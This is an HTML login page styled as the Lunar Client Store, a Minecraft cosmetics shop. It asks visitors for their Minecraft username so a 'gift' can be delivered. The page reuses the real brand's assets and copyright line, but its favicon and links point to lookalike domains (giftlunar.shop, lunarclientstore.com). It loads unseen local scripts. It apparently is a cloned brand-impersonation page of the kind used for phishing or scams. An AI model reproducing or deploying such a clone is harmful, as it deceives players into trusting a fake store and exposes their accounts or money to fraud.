<!DOCTYPE html>

<html lang="en" class="light-mode"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
        <link rel="shortcut icon" href="https://store.lunarclient.com/templateassets/87e2d93e-bea0-4edf-952b-736a868527dc/favicon.ico">
        <link href="https://fonts.cdnfonts.com/css/panton" rel="stylesheet">
        <style>

            .nameonsteve{
                                font-family:"Minecraft",sans-serif;
                            }
                span{
                    font-family: "Panton",sans-serif;
                }
                #footer-cta>#inner-footer-cta>#cta-content>p>span{
                    font-family: "Roboto",sans-serif;
                }
                #footer-cta>#inner-footer-cta>#cta-content>p{
                    font-family: "Roboto",sans-serif;
                }

                .theme-light #navbar-secondary a{
                            font-family: "Panton",sans-serif;
                        }
                        .navbar-secondary-inner{

                    font-family: "Panton",sans-serif;

                        }
                        .theme-light #store-home #big-categories>.row .card>a>div h1 {
                    font-family: "Panton",sans-serif;
                }


                        #store-home #categories>.row .card>a>div h1{

                            font-family: "Panton",sans-serif;
                  }
                  h1{
                    font-family: "Panton",sans-serif;
                  }
                  #navbar>.nav-right #navbar-cta-btn[data-variant="store"] {

                    background-color: #3B96BE;;
                }
                p {

                    color: ##4B4B4B !important;
                }
                #footer-cta>#inner-footer-cta {
                    display: flex;
                    justify-content: space-between;
                    align-items: center;
                    background-position: center;
                    background-size: cover;
                    background-repeat: no-repeat;
                    padding: 40px 45px;
                    margin-bottom: -100px;
                    border-radius: 1.5em;
                    position: relative;
                    z-index: 1;
                    background-image: url(background-alt.png);
                }
                #navbar>.nav-right #navbar-cta-btn{
                    color: #fff;
                    font-family: "Panton",sans-serif;
                }

                .store-card>.card-body a {
                    text-shadow: 0px 2px 0pxrgba(0,0,0,0.15);
                    border-radius: 12.5px;
                    text-transform: uppercase;
                    font-weight: 800;
                    letter-spacing: 2px;
                    width: 100%;
                    padding: 8px 12px;
                }
                .input-group {
                    -webkit-text-size-adjust: 100%;
                    -webkit-tap-highlight-color: transparent;
                    --blue: #007bff;
                    --indigo: #6610f2;
                    --purple: #6f42c1;
                    --pink: #e83e8c;
                    --red: #dc3545;
                    --orange: #fd7e14;
                    --yellow: #ffc107;
                    --green: #28a745;
                    --teal: #20c997;
                    --cyan: #17a2b8;
                    --white: #fff;
                    --gray: #6c757d;
                    --gray-dark: #343a40;
                    --primary: #007bff;
                    --secondary: #6c757d;
                    --success: #28a745;
                    --info: #17a2b8;
                    --warning: #ffc107;
                    --danger: #dc3545;
                    --light: #f8f9fa;
                    --dark: #343a40;
                    --breakpoint-xs: 0;
                    --breakpoint-sm: 576px;
                    --breakpoint-md: 768px;
                    --breakpoint-lg: 992px;
                    --breakpoint-xl: 1200px;
                    --font-family-sans-serif: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
                    --font-family-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
                    font-size: 1rem;
                    font-weight: 400;
                    line-height: 1.5;
                    text-align: left;
                    font-family: "Roboto",sans-serif;
                    word-wrap: break-word;
                    color: #4B4B4B !important;
                    box-sizing: border-box;
                    scroll-behavior: smooth;
                    position: relative;
                    display: flex;
                    flex-wrap: wrap;
                    align-items: stretch;
                    width: 100%;
                    border-radius: 15px;
                    overflow: hidden;
                    background-color: #EFF0F1;%;
                }
                .username{
                    -webkit-text-size-adjust: 100%;
                    -webkit-tap-highlight-color: transparent;
                    --blue: #007bff;
                    --indigo: #6610f2;
                    --purple: #6f42c1;
                    --pink: #e83e8c;
                    --red: #dc3545;
                    --orange: #fd7e14;
                    --yellow: #ffc107;
                    --green: #28a745;
                    --teal: #20c997;
                    --cyan: #17a2b8;
                    --white: #fff;
                    --gray: #6c757d;
                    --gray-dark: #343a40;
                    --primary: #007bff;
                    --secondary: #6c757d;
                    --success: #28a745;
                    --info: #17a2b8;
                    --warning: #ffc107;
                    --danger: #dc3545;
                    --light: #f8f9fa;
                    --dark: #343a40;
                    --breakpoint-xs: 0;
                    --breakpoint-sm: 576px;
                    --breakpoint-md: 768px;
                    --breakpoint-lg: 992px;
                    --breakpoint-xl: 1200px;
                    --font-family-sans-serif: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
                    --font-family-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
                    text-align: left;
                    font-family: "Roboto",sans-serif;
                    color: #4B4B4B;
                    word-wrap: break-word;
                    box-sizing: border-box;
                    scroll-behavior: smooth;
                    margin-top: 0;
                    margin-bottom: .5rem;
                    font-weight: 500;
                    line-height: 1.2;
                    font-size: 1.75rem;
                }

                #checkout-redeem-coupon .btn, #giftcard-balance .btn{
                    background-color: #3B96BE;
                    color: #fff;
                }
                .theme-light .store-card>.card-body .btn{
                    background-color: #3B96BE;
                    color: #fff;
                }
                .store-card>.card-body a{
                    background-color: #3B96BE;
                    color: #fff;
                    white-space: nowrap;
                }
                #store-login>.card #store-login-form>.input-group>button{
                    background-color: #3B96BE;
                    color: #fff;
                }
                #store-login>.card #store-login-form>.input-group>input{
                    background-color: #EFF0F1;
                }
        </style>
        
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="Login with your Minecraft Username to the Lunar Client Store to be able to access explore the cosmetics and emotes, aswell as the ability to add items to your cart!">
        <title>Login | Lunar Client Store</title>
        <link rel="shortcut icon" href="https://store.giftlunar.shop/img/favicon.ico">
        <meta property="og:site_name" content="Lunar Client Store">
        <meta property="og:title" content="Login | Lunar Client Store">
        <meta property="og:locale" content="en_US">
        <meta property="og:type" content="website">
        <meta property="og:image" content="https://store.lunarclient.com/templateassets/f910be7d-99a8-4836-85df-e551ead3afc0/cards/home.webp">
        <meta property="og:image:width" content="876">
        <meta property="og:image:height" content="438">
        <meta property="og:description" content="Login with your Minecraft Username to the Lunar Client Store to be able to access explore the cosmetics and emotes, aswell as the ability to add items to your cart!">

        <meta name="twitter:domain" content="store.lunarclient.com">
        <meta name="twitter:site" content="@LunarClient">
        <meta name="twitter:creator" content="@LunarClient">
        <meta name="twitter:card" content="summary_large_image">
        <meta name="twitter:title" content="Login | Lunar Client Store">
        <meta name="twitter:image" content="https://store.lunarclient.com/templateassets/f910be7d-99a8-4836-85df-e551ead3afc0/cards/home.webp">
        <meta name="twitter:description" content="Login with your Minecraft Username to the Lunar Client Store to be able to access explore the cosmetics and emotes, aswell as the ability to add items to your cart!">

        <link href="bootstrap.min.css" rel="stylesheet">
        <link href="roboto.css" rel="stylesheet">
        <link href="aos.css" rel="stylesheet">
        <link href="fonts.css" rel="stylesheet">
        <link href="main.css" rel="stylesheet">
        <link rel="stylesheet" href="fontawesome.css">

        <!-- <script src="../config.js" type="module"></script>  -->
        <script src="script.js" type="module"></script>
        <script src="jquery.min.js"></script>

        <title>Login | Lunar Client Store</title>
        <link rel="shortcut icon" href="https://store.giftlunar.shop/img/favicon.ico">

        <meta name="keywords" content="lunar client, lunar client store, lunar client cosmetics, lunar client cloaks">
        <meta name="robots" content="index, follow">
        
        <meta name="language" content="English">
        <meta name="description" content="Explore your favorite Minecraft Cosmetics on the Lunar Client Store, including Cloaks, Wings, Emotes, and much more! Shop now and explore the range of Lunar Client Cosmetics on offer.">

        <meta property="og:site_name" content="Lunar Client Store">
        <meta property="og:title" content="Shop Lunar Client Cosmetics &amp; Emotes | Lunar Client Store">
        <meta property="og:locale" content="en_US">
        <meta property="og:type" content="website">
        <meta property="og:image" content="https://store.lunarclient.com/templateassets/f910be7d-99a8-4836-85df-e551ead3afc0/cards/home.webp">
        <meta property="og:image:width" content="876">
        <meta property="og:image:height" content="438">
        <meta property="og:description" content="Explore your favorite Minecraft Cosmetics on the Lunar Client Store, including Cloaks, Wings, Emotes, and much more! Shop now and explore the range of Lunar Client Cosmetics on offer.">

        <meta name="twitter:domain" content="store.lunarclient.com">
        <meta name="twitter:site" content="@LunarClient">
        <meta name="twitter:creator" content="@LunarClient">
        <meta name="twitter:card" content="summary_large_image">
        <meta name="twitter:title" content="Shop Lunar Client Cosmetics &amp; Emotes | Lunar Client Store">
        <meta name="twitter:image" content="https://store.lunarclient.com/templateassets/f910be7d-99a8-4836-85df-e551ead3afc0/cards/home.webp">
        <meta name="twitter:description" content="Explore your favorite Minecraft Cosmetics on the Lunar Client Store, including Cloaks, Wings, Emotes, and much more! Shop now and explore the range of Lunar Client Cosmetics on offer.">
    <script src="chrome-extension://mooikfkahbdckldjjndioackbalphokd/assets/prompt.js"></script></head>
    <body>
        <section id="navbar" data-variant="store" class="navbar-home" style="padding-right: 564.594px">
            <a href="https://lunarclientstore.com/" class="logo-holder no-drag">
                <img src="logo.png" class="no-drag" alt="Lunar Client Logo">

                <span class="home-title">Client Store</span>
                <span class="home-direct">Click to visit home</span>
            </a>
            <div class="nav-right">
                <div class="nav-icons">
                    <div id="nav-icons-holder" class="no-drag">
                        <div class="dropdown currency-selector">
                            <i class="fas fa-dollar-sign" data-bs-toggle="dropdown" aria-hidden="true"></i>

                            <ul class="dropdown-menu">
                                <div class="dropdown-menu-inner">
                                    <p>Click to select</p>
                                    <li>
                                        <p>nNot Found</p>
                                    </li>
                                </div>
                            </ul>
                        </div>
                        <i class="fas fa-globe" data-bs-toggle="tooltip" data-bs-placement="bottom" title="" aria-hidden="true" data-bs-original-title="Visit our website" aria-label="Visit our website"></i><span class="sr-only">Visit our website</span>

                        <div class="theme-selector" data-bs-toggle="tooltip" data-bs-placement="bottom" title="" data-bs-original-title="Theme toggle">
                            <i class="far fa-moon" aria-hidden="true"></i>
                        </div>
                    </div>
                </div>
                <div class="dropdown basket-viewer">
                    <a id="navbar-cta-btn" class="no-drag" href="https://lunarclientstore.com/login" data-variant="store">
                        <img src="606e2ff0-ed77-4842-9d6c-e1d3321c7838">
                        <div>
                            <p>Click to Login</p>
                            <h3>Guest User</h3>
                        </div>
                    </a>
                </div>

                <a id="navbar-menu" class="hamburger hamburger--slider no-drag">
                    <div class="hamburger-box">
                        <div class="hamburger-inner"></div>
                    </div>
                    <span class="inner-text">Menu</span>
                </a>
            </div>
        </section>

        <div id="theme-settings" class="modal fade" tabindex="-1" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered modal-dialog-scrollable">
                <div class="modal-content" style="border-radius: 0.5rem">
                    <div class="modal-header">
                        <h5 class="modal-title">
                            <i class="fas fa-brush" aria-hidden="true"></i>
                            Theme Settings
                        </h5>
                        <a type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close">
                            <i class="fa fa-times-circle" aria-hidden="true"></i>
                        </a>
                    </div>
                    <div class="modal-body"></div>
                </div>
            </div>
        </div>
        <section id="header" style="
                background-image: linear-gradient(
                        to top,
                        rgba(0, 0, 0, 0.65),
                        rgba(0, 0, 0, 0.1)
                    ),
                    url(&);
            ">
            <div id="inner-header" data-variant="impact">
                <h1 id="header-title">
                    <span> Minecraft Username </span>
                </h1>

                <h5 id="header-subtitle">
                    Please enter your username to continue
                </h5>
            </div>
        </section>
        <section id="store-login" class="container">
            <div class="card aos-init aos-animate" data-aos="fade-up">
                <div class="row">
                    <div id="skin-display" class="col-12 col-lg-6" style="background-image: url(&)">
                        <div id="skin-display-nameplate">
                            <img src="logo.png" height="27px" width="29px" class="no-drag" alt="Lunar Client Logo">
                            <span id="spanName" class="nameonsteve">???</span>
                        </div>
                        <img class="no-drag" src="steve" alt="Minecraft Character" id="fullSkin" onerror="this.src=&#39;https://skins.mcstats.com/body/front/steve&#39;;this.onerror=&#39;&#39;;">
                    </div>

                    <div class="col-12 col-lg-6">
                        <div id="store-login-form" method="post">
                            <h3 class="username" style="color: #4b4b4b">
                                What is my username?
                            </h3>
                            <p>
                                Your username is the name you appear as on a
                                Minecraft Server. If you don’t know what your
                                username is, please refer to the Minecraft or
                                Lunar Client launcher.
                            </p>
                            <p>
                                Ensure there are no spelling errors or spaces!
                                This will result in your gift going to the wrong
                                person or vanish in thin air.
                            </p>
                            <div class="input-group">
                                <div id="skin-display-head" class="input-group-text" style="background-color: #eff0f1">
                                    <img src="steve(1)" height="32px" width="32px" class="no-drag" alt="Minecraft Head" id="faceSkin">
                                </div>
                                <input type="text" name="ign" id="ign" class="form-control input-lg form-control-lg" placeholder="Enter your username..." autocomplete="off" spellcheck="false">
                                <button class="btn" name="subb" onclick="submitIgn()" type="button">
                                    <i class="fas fa-arrow-circle-right" aria-hidden="true"></i>
                                    Continue
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section id="footer-cta" class="container aos-init aos-animate" data-aos="fade-up">
            <div id="inner-footer-cta" data-variant="store" style="background-image: url(background-alt.png)">
                <div id="cta-content">
                    <img src="logo.png" data-variant="plus" class="no-drag" height="110px" width="120px" alt="Lunar Client Logo">
                    <i class="fas fa-plus" aria-hidden="true"></i>
                    <p>
                        Gain access to <span>exclusive features</span>, support
                        <span>development of the client</span> and get a
                        <span>stylish icon</span>!<br>
                        <span class="cta-hook">So what are you waiting for - Subscribe
                            today!</span>
                    </p>
                </div>
            </div>
        </section>
        <footer class="no-drag" data-cta-visible="true">
            <div id="inner-footer" class="container">
                <div id="footer-socials">
                    <a href="https://www.lunarclient.com/twitter" aria-label="Twitter" target="_blank">
                        <i class="fab fa-twitter" aria-hidden="true"></i>
                    </a>
                    <a href="https://www.lunarclient.com/discord" aria-label="Discord" target="_blank">
                        <i class="fab fa-discord" aria-hidden="true"></i>
                    </a>
                    <a href="https://www.lunarclient.com/tiktok" aria-label="TikTok" target="_blank">
                        <i class="fab fa-tiktok" aria-hidden="true"></i>
                    </a>
                    <a href="https://www.lunarclient.com/instagram" aria-label="Instagram" target="_blank">
                        <i class="fab fa-instagram" aria-hidden="true"></i>
                    </a>
                    <a href="https://www.lunarclient.com/telegram" aria-label="Telegram" target="_blank">
                        <i class="fab fa-telegram-plane" aria-hidden="true"></i>
                    </a>
                    <a href="https://www.lunarclient.com/youtube" aria-label="YouTube" target="_blank">
                        <i class="fab fa-youtube" aria-hidden="true"></i>
                    </a>
                </div>
                <div id="footer-contents" class="row">
                    <div id="footer-left" class="col-12 col-lg-3">
                        <a href="index.html" aria-label="Moonsworth, LLC">
                            <img src="moonsworth.png" height="42px" width="42px" class="no-drag" alt="Moonsworth, LLC Logo">
                            © 2022 Moonsworth, LLC
                        </a>
                    </div>

                    <div id="footer-middle" class="col-12 col-lg-6">
                        <a href="https://store.lunarclient.com/terms/checkout" aria-label="Terms" target="_blank">Terms</a>
                        <a href="https://store.lunarclient.com/terms/privacy" aria-label="Privacy Policy" target="_blank">Privacy Policy</a>
                        <a href="https://store.lunarclient.com/terms/impressum" aria-label="Impressum" target="_blank">Impressum</a>
                        <a href="https://support.lunarclient.com/?utm_source=client-store&amp;utm_medium=footer&amp;utm_campaign=lead" aria-label="Support" target="_blank">Support</a>
                    </div>

                    <div id="footer-right" class="col-12 col-lg-3">
                        Not affiliated with Mojang Studios
                    </div>
                </div>
            </div>
        </footer>
        <div id="modal-display" class="modal fade" tabindex="-1" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered modal-dialog-scrollable">
                <div class="modal-content" style="border-radius: 0.5rem"></div>
            </div>
        </div>
        <div id="waiting-overlay" style="display: none">
            <i class="fa fa-cog fa-spin fa-3x" aria-hidden="true"></i>
        </div>
    

    <script src="control.js"></script>



</body></html>